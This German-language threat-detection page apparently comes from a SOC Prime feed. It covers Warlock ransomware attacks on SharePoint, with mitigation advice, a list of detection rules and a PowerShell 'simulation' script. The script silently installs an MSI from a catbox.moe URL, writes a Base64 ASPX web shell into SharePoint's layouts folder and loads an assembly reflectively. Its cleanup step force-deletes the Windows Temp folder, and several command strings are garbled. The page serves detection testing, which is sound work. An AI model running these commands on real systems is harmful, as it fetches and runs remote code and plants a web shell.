SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Warlock Ransomware greift kritische Wasser- und Telekommunikationsinfrastruktur an

Author Photo
SOC Prime Team linkedin icon Folgen
Warlock Ransomware greift kritische Wasser- und Telekommunikationsinfrastruktur an
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Ein China-vernetzter Bedrohungsakteur, der als Longlegs verfolgt wird, setzt Warlock Ransomware ein, indem er Schwachstellen in Microsoft SharePoint ausnutzt. Die Gruppe verwendet eine ToolShell-Exploit-Kette für den initialen Zugang, bevor sie seitwärts über kompromittierte Netzwerke agiert. Die Angreifer wenden auch fortschrittliche Ausweichtechniken an, einschließlich der Ausnutzung von anfälligen Treibern zur Deaktivierung von Sicherheitssoftware und der Nutzung legitimer Cloud-Dienste für die Bereitstellung von Nutzlasten.

Untersuchung

Die Untersuchung verfolgte die Aktivität von der anfänglichen SharePoint-Ausnutzung bis zur Bereitstellung einer Webshell im LAYOUTS-Verzeichnis. Die Analysten beobachteten gefälschte ASP.NET-Maschinenschlüssel, die für Remotecodeausführung verwendet wurden, und Ransomware, die im SYSVOL-Share für die Verteilung im gesamten Domain-Netzwerk bereitgestellt wurde. Die Angriffskette umfasste auch DLL-Sideloading und die Ausnutzung der Tunneling-Funktionalität von Visual Studio Code für anhaltenden Zugriff.

Minderung

Organisationen sollten die Priorität auf die Patch-Verwaltung von Microsoft SharePoint Server legen, um bekannte ToolShell-Schwachstellen zu beheben. Die Durchsetzung strenger Kontrollen über signierte, aber anfällige Treiber kann helfen, BYOVD-Angriffe zu verhindern. Sicherheitsteams sollten auch die anomale Nutzung von Living-off-the-Land-Tools überwachen und den Zugriff auf den SYSVOL-Share für nicht-administrative Aktivitäten einschränken, um seitliche Bewegungen und Ransomware-Bereitstellungen zu reduzieren.

Reaktion

Wenn bösartige Aktivitäten festgestellt werden, sollten Vorfallreaktionsteams betroffene SharePoint-Server isolieren und den SYSVOL-Share auf unautorisierte Skripte oder Binärdateien prüfen. Führen Sie eine umfassende Überprüfung der Domain-Konten durch, konzentrieren Sie sich auf unautorisierte Hinzufügungen zur lokalen Administratorgruppe. Überprüfen Sie den Netzwerkverkehr auf ausgehende Verbindungen zu Dateifreigabediensten wie catbox.moe oder wasabisys.com, die für die Nutzlaststaging verwendet werden.

Angriffsfluss

Erkennungen

Benutzer zur lokalen Administratorgruppe hinzufügen (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

Download oder Upload über Powershell (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

Verdächtige Powershell-Strings (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

.NET-Klassen/Methoden von verdächtigen ausgehenden Powershell-Befehlen aufrufen (über Prozess-Erstellung)

SOC Prime Team
05. Oktober 2026

Mögliche Entdeckung von Netzwerkfreigaben (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

Entdeckung verdächtiger Domain-Vertrauensstellungen (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

Möglicher Versuch der Remote-Installation von MSI-Dateien (über die Befehlszeile)

SOC Prime Team
05. Oktober 2026

Verdächtige Ausführung aus öffentlichem Benutzerprofil (über Prozess-Erstellung)

SOC Prime Team
05. Oktober 2026

Verdächtige Powershell-Strings (über Powershell)

SOC Prime Team
05. Oktober 2026

Verdächtige .NET-Methoden von Powershell aufrufen (über Powershell)

SOC Prime Team
05. Oktober 2026

Mögliche Erstellung einer Webshell in Microsoft Exchange / Sharepoint-Verzeichnissen (über Datei-Ereignis)

SOC Prime Team
05. Oktober 2026

Verdächtige Dateien im öffentlichen Benutzerprofil (über Datei-Ereignis)

SOC Prime Team
05. Oktober 2026

Mögliche Dateninfiltration / Exfiltration / C2 über Drittanbieter-Services / -Tools (über Proxy)

SOC Prime Team
05. Oktober 2026

Mögliche Dateninfiltration / Exfiltration / C2 über Drittanbieter-Services / -Tools (über DNS)

SOC Prime Team
05. Oktober 2026

Verdächtige Command-and-Control-Anfragen zu Out-of-Band-Interaktionsdomains (über DNS)

SOC Prime Team
05. Oktober 2026

IOCs (HashSha256) zur Erkennung: Angreifer der Warlock-Ransomware treffen Wasser- und Telekommunikationsbetreiber

SOC Prime KI-Regeln
05. Oktober 2026

Erkennung von bösartigen PowerShell-Befehlen zur Code-Ausführung [Windows Powershell]

SOC Prime KI-Regeln
05. Oktober 2026

Warlock-Ransomware-Inszenierung und -Ausführung über Netzwerkfreigaben [Windows-Datei-Ereignis]

SOC Prime KI-Regeln
05. Oktober 2026

Warlock-Ransomware-Indikatoren auf SharePoint-Servern [Windows-Prozess-Erstellung]

SOC Prime KI-Regeln
05. Oktober 2026

Simulation der Ausführung

Voraussetzung: Die Telemetrie- und Baseline-Pre-Flight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennung zu verursachen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die erwartete Telemetrie zu erzeugen, die die Erkennungslogik erwartet. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angrifferzählung & Befehle: Der Gegner beabsichtigt, Warlock-Ransomware auf einem SharePoint-Server zu verteilen. Der Angriff beginnt mit der Nutzung von msiexec um ein bösartiges MSI von einer remote von Angreifern gesteuerten Domain (catbox.moe) zu ziehen. Nach dem initialen Zugriff verwendet der Angreifer PowerShell, um eine bösartige ASPX Web-Shell in den SharePoint layout2sp.aspx Pfad zu schreiben, indem eine Base64-kodierte Nutzlast verwendet wird, um einfache String-Filter zu umgehen. Schließlich versucht der Angreifer, eine bösartige .NET-Bibliothek direkt in den Speicher zu laden, indem er System.Workflow.ComponentModel verwendet, um Code auszuführen, ohne einen Datei-Footprint auf der Festplatte zu hinterlassen.

  • Regressionstest-Skript:

    # Warlock-Ransomware-Simulationsskript
    # HINWEIS: Dieses Skript ist nur für autorisierte Testzwecke.
    
    Write-Host "[!] Starten der Warlock-Ransomware-Simulation..." -ForegroundColor Red
    
    # 1. Simulierte MSIEXEC-Remote-Download-Simulation (Auswahl 3)
    Write-Host "[*] MSIEXEC-Remote-Payload-Download simulieren..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simulierte PowerShell-ASPX-Web-Shell-Drop-Simulation (Auswahl 1)
    # Wir verwenden den exakten String aus der Regel, um die Erkennung sicherzustellen
    Write-Host "[*] PowerShell Web Shell Drop via Base64 simulieren..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simuliertes reflektierendes Assembly-Laden (Auswahl 2)
    Write-Host "[*] Reflektierendes Assembly-Laden simulieren..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Simulationsbefehle gesendet." -ForegroundColor Green
  • Aufräumbefehle:

    # Aufräumskript zur Entfernung aller während der Simulation erstellten Artefakte
    Write-Host "[!] Aufräumen von Simulationsartefakten..." -ForegroundColor Yellow
    
    # Entfernen Sie simulierte Dateien (Hinweis: In einem echten Test würden Sie die spezifischen erstellten Pfade anvisieren)
    # Da wir Dummy-Strings verwendet haben, stellen wir in erster Linie sicher, dass keine tatsächlichen bösartigen Dateien abgelegt wurden.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green